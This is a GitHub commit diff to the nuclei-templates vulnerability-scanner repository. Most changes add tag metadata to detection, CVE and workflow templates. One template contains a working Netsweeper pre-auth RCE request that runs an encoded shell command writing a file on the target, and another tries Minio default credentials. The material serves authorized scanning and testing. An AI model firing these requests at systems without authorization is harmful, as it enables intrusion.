Merge pull request #2622 from projectdiscovery/missing-tags

patch-1
Sandeep Singh 2021-09-10 12:32:47 +05:30 committed by GitHub
commit cf4ef2ac5a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
93 changed files with 126 additions and 115 deletions

View File

@ -6,6 +6,7 @@ info:
severity: critical
description: The drag-and-drop-multiple-file-upload-contact-form-7 plugin before 1.3.3.3 for WordPress allows Unrestricted File Upload and remote code execution by setting supported_type to php% and uploading a .php% file.
reference: https://github.com/amartinsec/CVE-2020-12800
tags: cve,cve2020,wordpress,wp-plugin
requests:
- raw:

View File

@ -9,13 +9,15 @@ info:
reference:
- https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
- https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
additional-fields:
hex-payload: 'echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out'
requests:
- method: GET
path:
# Hex payload: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out
- "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5"
- "{{BaseURL}}/webadmin/out"
headers:
Referer: "{{BaseURL}}/webadmin/admin/service_manager_data.php"

View File

@ -8,6 +8,7 @@ info:
- https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27
author: geeknik
severity: medium
tags: cve,cve2021,xss,npm
requests:
- raw:

View File

@ -4,23 +4,27 @@ info:
name: Minio Default Password
author: pikpikcu
severity: medium
tags: default-login,minio
requests:
- method: POST
path:
- "{{BaseURL}}/minio/webrpc"
headers:
Content-Type: application/json
body: |
{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}
body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}'
- method: POST
path:
- "{{BaseURL}}/minio/webrpc"
headers:
Content-Type: application/json
body: |
{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"}
body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"}'
matchers-condition: and
matchers:

View File

@ -1,9 +1,11 @@
id: prometheus-exposed-panel
info:
name: Prometheus.io exposed panel
author: organiccrap
severity: low
# usually runs on port http/9090
tags: panel,prometheus
requests:
- method: GET
path:
@ -12,4 +14,4 @@ requests:
matchers:
- type: word
words:
- <title>Prometheus Time Series Collection and Processing Server</title>
- '<title>Prometheus Time Series Collection and Processing Server</title>'

View File

@ -4,7 +4,8 @@ info:
name: View Yii Debugger Information
author: geeknik
reference: https://yii2-framework.readthedocs.io/en/stable/guide/tool-debugger/
severity: info
severity: low
tags: yii,debug,exposure
requests:
- method: GET
@ -16,11 +17,14 @@ requests:
- "{{BaseURL}}/sapi/debug/default/view"
redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<title>Yii Debugger</title>"

View File

@ -5,6 +5,7 @@ info:
author: philippedelteil
severity: info
reference: https://ask.shoppable.com/knowledge/quick-start-api-guide
tags: exposure,shoppable,token
requests:
- method: GET

View File

@ -5,6 +5,7 @@ info:
author: JTeles,pikpikcu
severity: info
reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications
tags: misconfig,exposure,frontpage
requests:
- method: GET

View File

@ -1,18 +1,22 @@
id: artica-web-proxy-detect
info:
name: Artica Web Proxy Detect
author: dwisiswant0
severity: info
tags: tech,artica,proxy
requests:
- method: GET
path:
- "{{BaseURL}}/fw.login.php"
matchers-condition: and
matchers:
- type: word
words:
- "Welcome to the Artica Web Administration Interface"
- type: status
status:
- 200

View File

@ -4,6 +4,7 @@ info:
name: Basic auth detection
author: w4cky_
severity: info
tags: tech,basic-auth
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: BIG-IP Configuration Utility detected
author: dwisiswant0
severity: info
tags: tech,bigip
requests:
- method: GET

View File

@ -5,6 +5,7 @@ info:
author: joanbono
severity: info
reference: https://portswigger.net/burp/documentation/enterprise/api-reference
tags: burp,tech
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
author: geeknik
description: Cacti is a complete network graphing solution -- https://www.cacti.net/
severity: info
tags: tech,cacti
requests:
- method: GET

View File

@ -1,9 +1,11 @@
id: clockwork-php-page
info:
name: Clockwork PHP page exposure
author: organiccrap
severity: high
reference: https://twitter.com/damian_89_/status/1250721398747791360
tags: tech,clockwork
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: Detect Agentejo Cockpit
author: dwisiswant0
severity: info
tags: tech,cockpit
requests:
- method: GET

View File

@ -1,9 +1,11 @@
id: dell-idrac6-detect
info:
name: Detect Dell iDRAC6
author: kophjager007
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
severity: info
tags: tech,dell
requests:
- method: GET

View File

@ -1,9 +1,11 @@
id: dell-idrac7-detect
info:
name: Detect Dell iDRAC7
author: kophjager007
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
severity: info
tags: tech,dell
requests:
- method: GET

View File

@ -1,9 +1,11 @@
id: dell-idrac8-detect
info:
name: Detect Dell iDRAC8
author: kophjager007
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
severity: info
tags: tech,dell
requests:
- method: GET

View File

@ -1,9 +1,11 @@
id: dell-idrac9-detect
info:
name: Detect Dell iDRAC9
author: kophjager007
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
severity: info
tags: tech,dell
requests:
- method: GET

View File

@ -10,6 +10,7 @@ info:
- https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139
- https://github.com/devanshbatham/FavFreak
- https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv
tags: tech,favicon
requests:
- method: GET

View File

@ -5,11 +5,13 @@ info:
author: organiccrap
severity: low
reference: http://ghostlulz.com/google-exposed-firebase-database/
tags: tech,firebase
requests:
- method: GET
path:
- "{{BaseURL}}/.settings/rules.json?auth=FIREBASE_SECRET"
matchers:
- type: word
words:

View File

@ -4,6 +4,7 @@ info:
name: Google Bucket detection
author: 0xTeles
severity: info
tags: tech,gstorage,google,bucket
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: GraphQL API Detection
author: NkxxkN,ELSFA7110
severity: info
tags: tech,graphql
requests:
- method: POST

View File

@ -4,6 +4,7 @@ info:
name: Detect Graylog REST API
author: PR3R00T
severity: info
tags: tech,graylog
requests:
- method: GET

View File

@ -1,9 +1,11 @@
id: gunicorn-detect
info:
name: Detect Gunicorn Server
author: joanbono
description: Gunicorn Python WSGI HTTP Server for UNIX - https://github.com/benoitc/gunicorn
severity: info
tags: tech,gunicorn
requests:
- method: GET
@ -22,4 +24,4 @@ requests:
- type: kval
part: header
kval:
- Server
- Server

View File

@ -1,8 +1,10 @@
id: harbor-detect
info:
name: Harbor Detect
author: pikpikcu
severity: info
tags: tech,harbor
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: Detect Home Assistant
author: fabaff
severity: info
tags: tech,iot
requests:
- method: GET

View File

@ -5,6 +5,7 @@ info:
author: milo2012
severity: info
description: Version of HP iLO
tags: tech,ilo
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: Jaspersoft detected
author: koti2
severity: info
tags: tech,jaspersoft
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: Jellyfin detected
author: dwisiswant0
severity: info
tags: tech,jellyfin
requests:
- method: GET
@ -13,6 +14,8 @@ requests:
- "{{BaseURL}}/index.html"
- "{{BaseURL}}/web/index.html"
- "{{BaseURL}}/web/manifest.json"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
@ -22,6 +25,7 @@ requests:
- "The Free Software Media System"
condition: or
part: body
- type: status
status:
- 200

View File

@ -4,11 +4,13 @@ info:
name: Jolokia Version Disclosure
author: mavericknerd,dwisiswant0
severity: info
tags: tech,jolokia
requests:
- method: GET
path:
- '{{BaseURL}}/jolokia/version'
matchers-condition: and
matchers:
- type: word
@ -17,6 +19,7 @@ requests:
- '"protocol":'
- '"agent":'
condition: and
- type: status
status:
- 200

View File

@ -4,6 +4,7 @@ info:
name: Kibana Service Detection
author: petruknisme
severity: info
tags: tech,kibana
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
author: geeknik
description: The Cloud-Native API Gateway - https://github.com/Kong/kong
severity: info
tags: tech,kong
requests:
- method: GET

View File

@ -1,9 +1,11 @@
id: liferay-portal-detect
info:
name: Liferay Portal Detection
author: organiccrap,dwisiswant0
severity: info
reference: https://github.com/mzer0one/CVE-2020-7961-POC # CVE-2020-7961: Liferay Portal Unauthenticated RCE
tags: tech,liferay
requests:
- method: GET

View File

@ -1,15 +1,11 @@
id: linkerd-badrule-detect
# Detect the Linkerd service by overriding the delegation table with an invalid
# rule, the presence of the service is indicated by either:
# - a "Via: .. linkerd .."
# - a "l5d-err" and/or a "l5d-success" header
# - a literal error in the body
info:
name: Linkerd detection via bad rule
author: dudez
severity: info
tags: tech,linkerd
reference: https://linkerd.io
requests:
- method: GET

View File

@ -1,8 +1,10 @@
id: lotus-domino-version
info:
name: Lotus Domino Version Extractor
author: CasperGN
severity: info
tags: tech,lotus
requests:
- method: GET
path:

View File

@ -1,13 +1,17 @@
id: metabase-version-detect
info:
name: Detect Metabase Version
author: revblock
description: If a Metabase instance is deployed on the target URL it will return a login page with the version number in the page source
severity: info
tags: tech,metabase
requests:
- method: GET
path:
- "{{BaseURL}}/auth/login"
matchers-condition: and
matchers:

View File

@ -1,9 +1,11 @@
id: mrtg-detect
info:
name: Detect MRTG
author: geeknik
description: The Multi Router Traffic Grapher -- https://oss.oetiker.ch/mrtg/
severity: info
tags: tech,mrtg
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: Netsweeper WebAdmin detected
author: dwisiswant0
severity: info
tags: tech,netsweeper
requests:
- method: GET

View File

@ -1,9 +1,12 @@
id: nginx-version
info:
name: nginx version detect
author: philippedelteil
description: Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.
severity: info
tags: tech,nginx
requests:
- method: GET
path:

View File

@ -4,6 +4,7 @@ info:
name: Apache NiFi detect
author: dwisiswant0
severity: info
tags: tech,apache,nifi
requests:
- method: GET
@ -15,6 +16,7 @@ requests:
- "{{BaseURL}}/flow/registries"
- "{{BaseURL}}/system-diagnostics"
- "{{BaseURL}}/nifi-api/access/config"
matchers-condition: and
matchers:
- type: regex
@ -22,6 +24,7 @@ requests:
- "supportsLogin"
- "disconnectedNodeAcknowledged"
- "(aggregate|node)Snapshots?"
- type: status
status:
- 200

View File

@ -1,9 +1,11 @@
id: oidc-detect
info:
name: Detect OpenID Connect provider
author: jarijaas
severity: info
description: Detects OpenID Connect providers. See https://en.wikipedia.org/wiki/OpenID_Connect
tags: tech,oidc
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: Detect OpenAM and OpenSSO
author: philippedelteil
severity: info
tags: tech,openam
requests:
- method: GET

View File

@ -1,8 +1,10 @@
id: pi-hole-detect
info:
name: pi-hole detector
author: geeknik
severity: info
tags: tech,pihole
requests:
- method: GET
@ -14,6 +16,7 @@ requests:
- type: status
status:
- 200
- type: word
words:
- "Pi-hole"

View File

@ -1,9 +1,11 @@
id: prtg-detect
info:
name: Detect PRTG
author: geeknik
description: Monitor all the systems, devices, traffic, and applications in your IT infrastructure -- https://www.paessler.com/prtg
severity: info
tags: tech,prtg
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
author: geeknik
description: A small command-line utility to interact with Redmine - https://pypi.org/project/Redmine-CLI/
severity: info
tags: tech,redmine
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: Detect Amazon-S3 Bucket
author: melbadry9
severity: info
tags: aws,s3,bucket,tech
requests:
- method: GET

View File

@ -1,16 +1,20 @@
id: shiro-detect
info:
name: Detect Shiro Framework
author: AresX
severity: info
tags: tech,shiro
requests:
- method: GET
path:
- '{{BaseURL}}'
headers:
Cookie: rememberMe=123;
matchers:
- type: word
words:
- rememberMe=deleteMe
- 'rememberMe=deleteMe'
part: header

View File

@ -4,13 +4,17 @@ info:
name: Detect Springboot Actuators
author: that_juan_,dwisiswant0,wdahlenb
severity: info
tags: tech,springboot,actuator
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/actuator"
- "{{BaseURL}}/favicon.ico"
- "{{BaseURL}}/actuator/favicon.ico"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word

View File

@ -4,6 +4,7 @@ info:
name: Detect Microsoft SQL Server Reporting
author: puzzlepeaches
severity: info
tags: tech,micrsoft
requests:
- method: GET

View File

@ -4,11 +4,13 @@ info:
name: Detect Telerik Web UI fileupload handler
author: organiccrap
severity: info
tags: tech,telerik
requests:
- method: GET
path:
- "{{BaseURL}}/Telerik.Web.UI.WebResource.axd?type=rau"
matchers:
- type: word
words:

View File

@ -1,9 +1,11 @@
id: terraform-detect
info:
name: Detect Terraform Provider
author: geeknik
description: Write Infrastructure as Code - https://www.terraform.io/
severity: info
tags: tech,terraform
requests:
- method: GET

View File

@ -1,10 +1,12 @@
id: tomcat-version-detect
id: tomcat-detect
info:
name: Detect Tomcat Version
name: Tomcat Version Detect
author: philippedelteil
description: If an Tomcat instance is deployed on the target URL, when we send a request for
a non existent resource we receive a Tomcat error page with version.
description: If an Tomcat instance is deployed on the target URL, when we send a request for a non existent resource we receive a Tomcat error page with version.
severity: info
tags: tech,tomcat,apache
requests:
- method: GET
path:
@ -26,4 +28,4 @@ requests:
name: version
group: 2
regex:
- '(<h3>)(.*?)(</h3>)'
- '(<h3>)(.*?)(</h3>)'

View File

@ -1,8 +1,10 @@
id: tor-socks-proxy
info:
name: Detect tor SOCKS proxy
author: geeknik
severity: info
tags: tech,tor,proxy
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: Detect Weblogic
author: bing0o
severity: info
tags: tech,weblogic
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: Werkzeug debugger console
author: pdteam
severity: info
tags: tech,werkzeug
requests:
- method: GET

View File

@ -8,6 +8,7 @@ info:
reference:
- https://www.securifera.com/advisories/sec-2020-0001/
- https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt
tags: rce,listserv,ognl
requests:
- method: GET

View File

@ -5,6 +5,7 @@ info:
author: pikpikcu
severity: medium
reference: https://www.freebuf.com/articles/system/125177.html
tags: injection,cacti
requests:
- method: GET

View File

@ -5,6 +5,7 @@ info:
author: pikpikcu
severity: info
reference: https://www.exploit-db.com/exploits/27888
tags: exposure,resin
requests:
- method: GET

View File

@ -5,6 +5,7 @@ info:
author: dhiyaneshDk
severity: high
reference: https://www.exploit-db.com/exploits/49054
tags: lfi,pmb
requests:
- method: GET

View File

@ -5,7 +5,7 @@ info:
author: dwisiswant0
severity: high
reference: https://www.exploit-db.com/exploits/48877
tags: auth-bypass
requests:
- raw:
- |

View File

@ -5,6 +5,7 @@ info:
author: dwisiswant0
severity: high
reference: https://www.exploit-db.com/exploits/48880
tags: auth-bypass,zms
requests:
- raw:

View File

@ -4,7 +4,6 @@ info:
name: Adobe Experience Manager Security Checks
author: dhiyaneshDK
description: A simple workflow that runs all Adobe Experience Manager related nuclei templates on a given target.
tags: workflow
workflows:
- template: technologies/aem-detection.yaml

View File

@ -4,7 +4,6 @@ info:
name: Apache Airflow Security Checks
author: pdteam
description: A simple workflow that runs all Apache Airflow related nuclei templates on a given target.
tags: workflow
workflows:

View File

@ -4,14 +4,8 @@ info:
name: Artica Web Proxy Security Checks
author: dwisiswant0,pdteam
description: A simple workflow that runs all Artica Web Proxy related nuclei templates on a given target.
tags: workflow
# Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0)
# Old workflows still remains valid, and will be working with all nuclei versions.
workflows:
- template: technologies/artica-web-proxy-detect.yaml
subtemplates:
- template: cves/2020/CVE-2020-17505.yaml

View File

@ -4,10 +4,8 @@ info:
name: Azkaban Security Checks
author: pdteam
description: A simple workflow that runs all Azkaban related nuclei templates on a given target.
tags: workflow
workflows:
- template: exposed-panels/azkaban-web-client.yaml
subtemplates:
- template: default-logins/azkaban/azkaban-web-client-default-creds.yaml

View File

@ -4,14 +4,8 @@ info:
name: F5 BIG-IP Security Checks
author: dwisiswant0
description: A simple workflow that runs all BigIP related nuclei templates on a given target.
tags: workflow
# Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0)
# Old workflows still remains valid, and will be working with all nuclei versions.
workflows:
- template: technologies/bigip-config-utility-detect.yaml
subtemplates:
- template: cves/2020/CVE-2020-5902.yaml

View File

@ -6,8 +6,6 @@ info:
description: A simple workflow that runs all Cacti related nuclei templates on a given target.
workflows:
- template: technologies/cacti-detect.yaml
subtemplates:
- template: vulnerabilities/other/cacti-weathermap-file-write.yaml

View File

@ -4,15 +4,9 @@ info:
name: Cisco ASA Security Checks
author: flag007
description: A simple workflow that runs all Cisco related nuclei templates on a given target.
tags: workflow
# Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0)
# Old workflows still remains valid, and will be working with all nuclei versions.
workflows:
- template: exposed-panels/cisco-asa-panel.yaml
subtemplates:
- template: cves/2020/CVE-2020-3187.yaml
- template: cves/2020/CVE-2020-3452.yaml

View File

@ -4,7 +4,6 @@ info:
name: Agentejo Cockpit Security Checks
author: dwisiswant0
description: A simple workflow that runs all Agentejo Cockpit related nuclei templates on a given target.
tags: workflow
workflows:
- template: technologies/cockpit-detect.yaml

View File

@ -3,7 +3,6 @@ info:
name: Dell iDRAC Security Checks
author: kophjager007
description: A workflow to identify Dell iDRAC instances and run all related nuclei templates.
tags: workflow
workflows:
- template: technologies/dell/dell-idrac6-detect.yaml

View File

@ -4,10 +4,8 @@ info:
name: GitLab Security Checks
author: pdteam
description: A simple workflow that runs all GitLab related nuclei templates on a given target.
tags: workflow
workflows:
- template: exposed-panels/gitlab-detect.yaml
subtemplates:
- tags: gitlab

View File

@ -4,10 +4,8 @@ info:
name: Grafana Security Checks
author: pdteam
description: A simple workflow that runs all Grafana related nuclei templates on a given target.
tags: workflow
workflows:
- template: exposed-panels/grafana-detect.yaml
subtemplates:
- tags: grafana

View File

@ -4,10 +4,8 @@ info:
name: Harbor Security Checks
author: pikpikcu
description: A simple workflow that runs all Harbor related nuclei templates on a given target.
tags: workflow
workflows:
- template: technologies/harbor-detect.yaml
subtemplates:
- template: cves/2019/CVE-2019-16097.yaml

View File

@ -3,7 +3,6 @@ info:
name: Jellyfin Security Checks
author: dwisiswant0
description: A simple workflow that runs all Jellyfin related nuclei templates on a given target.
tags: workflow
workflows:
- template: technologies/jellyfin-detect.yaml

View File

@ -4,10 +4,8 @@ info:
name: Jira Security Checks
author: micha3lb3n
description: A simple workflow that runs all Jira related nuclei templates on a given target.
tags: workflow
workflows:
- template: exposed-panels/jira-detect.yaml
subtemplates:
- tags: jira

View File

@ -4,13 +4,8 @@ info:
name: Liferay Security Checks
author: dwisiswant0
description: A simple workflow that runs all liferay related nuclei templates on a given target.
tags: workflow
# Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0)
# Old workflows still remains valid, and will be working with all nuclei versions.
workflows:
- template: technologies/liferay-portal-detect.yaml
subtemplates:
- template: cves/2020/CVE-2020-7961.yaml

View File

@ -4,13 +4,8 @@ info:
name: Lotus Domino Security Checks
author: CasperGN
description: A simple workflow that runs all Lotus Domino related nuclei templates on a given target.
tags: workflow
# Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0)
# Old workflows still remains valid, and will be working with all nuclei versions.
workflows:
- template: technologies/tech-detect.yaml
matchers:
- name: lotus-domino

View File

@ -4,7 +4,6 @@ info:
name: Lucee Detection Workflow
author: geeknik,dhiyaneshDk
description: A simple workflow that runs all Lucee related nuclei templates on a given target.
tags: workflow
workflows:
- template: technologies/lucee-detect.yaml

View File

@ -4,7 +4,6 @@ info:
name: Magento Security Checks
author: TechbrunchFR
description: A simple workflow that runs all Magento related nuclei templates on a given target.
tags: workflow
workflows:
- template: technologies/magento-detect.yaml

View File

@ -4,15 +4,9 @@ info:
name: MAGMI Security Checks
author: dwisiswant0
description: A simple workflow that runs all MAGMI related nuclei templates on a given target.
tags: workflow
# Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0)
# Old workflows still remains valid, and will be working with all nuclei versions.
workflows:
- template: technologies/magmi-detect.yaml
subtemplates:
- template: cves/2017/CVE-2017-7391.yaml
- template: cves/2020/CVE-2020-5776.yaml

View File

@ -4,13 +4,8 @@ info:
name: Mida eFramework Security Checks
author: CasperGN
description: A simple workflow that runs all Mida eFramework related nuclei templates on a given target.
tags: workflow
# Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0)
# Old workflows still remains valid, and will be working with all nuclei versions.
workflows:
- template: technologies/tech-detect.yaml
matchers:
- name: mida-eframework

View File

@ -4,14 +4,8 @@ info:
name: Netsweeper Security Checks
author: dwisiswant0
description: A simple workflow that runs all netsweeper related nuclei templates on a given target.
tags: workflow
# Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0)
# Old workflows still remains valid, and will be working with all nuclei versions.
workflows:
- template: technologies/netsweeper-webadmin-detect.yaml
subtemplates:
- template: cves/2020/CVE-2020-13167.yaml

View File

@ -4,7 +4,6 @@ info:
name: phpmyadmin-workflow
author: philippedelteil
description: A workflow that runs all PhpMyAdmin related nuclei templates on a given target
tags: workflow
workflows:
- template: exposed-panels/phpmyadmin-panel.yaml

View File

@ -4,13 +4,8 @@ info:
name: RabbitMQ Security Checks
author: fyoorer
description: A simple workflow that runs all rabbitmq related nuclei templates on a given target.
tags: workflow
# Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0)
# Old workflows still remains valid, and will be working with all nuclei versions.
workflows:
- template: exposed-panels/rabbitmq-dashboard.yaml
subtemplates:

View File

@ -4,7 +4,6 @@ info:
name: SAP NetWaver Security Checks
author: dwisiswant0
description: A simple workflow that runs all SAP NetWaver related nuclei templates on a given target.
tags: workflow
workflows:
- template: technologies/sap-netweaver-detect.yaml # HTTP Templates

View File

@ -4,10 +4,6 @@ info:
name: SolarWinds Orion Security Checks
author: dwisiswant0
description: A simple workflow that runs all SolarWinds Orion related nuclei templates on a given target.
tags: workflow
# Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0)
# Old workflows still remains valid, and will be working with all nuclei versions.
workflows:
- template: exposed-panels/solarwinds-orion.yaml

View File

@ -4,13 +4,8 @@ info:
name: Spring Boot Security Checks
author: dwisiswant0
description: A simple workflow that runs all Spring Boot related nuclei templates on a given target.
tags: workflow
# Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0)
# Old workflows still remains valid, and will be working with all nuclei versions.
workflows:
- template: technologies/springboot-actuator.yaml
subtemplates:
- tags: springboot

View File

@ -3,10 +3,8 @@ info:
name: ThinkCMF Security Checks
author: pdteam
description: A simple workflow that runs all ThinkCMF related nuclei templates on a given target.
tags: workflow
workflows:
- template: technologies/thinkcmf-detection.yaml
subtemplates:
- template: vulnerabilities/thinkcmf/

View File

@ -3,10 +3,8 @@ info:
name: ThinkPHP Security Checks
author: dr_set
description: A simple workflow that runs all ThinkPHP related nuclei templates on a given target.
tags: workflow
workflows:
- template: technologies/tech-detect.yaml
matchers:
- name: thinkphp

View File

@ -4,15 +4,9 @@ info:
name: vBulletin Security Checks
author: pdteam
description: A simple workflow that runs all vBulletin related nuclei templates on a given target.
tags: workflow
# Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0)
# Old workflows still remains valid, and will be working with all nuclei versions.
workflows:
- template: technologies/tech-detect.yaml
matchers:
- name: vbulletin
subtemplates:

View File

@ -3,10 +3,8 @@ info:
name: WebLogic Security Checks
author: dr_set
description: A simple workflow that runs all WebLogic related nuclei templates on a given target.
tags: workflow
workflows:
- template: technologies/weblogic-detect.yaml
subtemplates:

View File

@ -3,7 +3,6 @@ info:
name: Wordpress Security Checks
author: kiblyn11,zomsop82
description: A simple workflow that runs all wordpress related nuclei templates on a given target.
tags: workflow
workflows: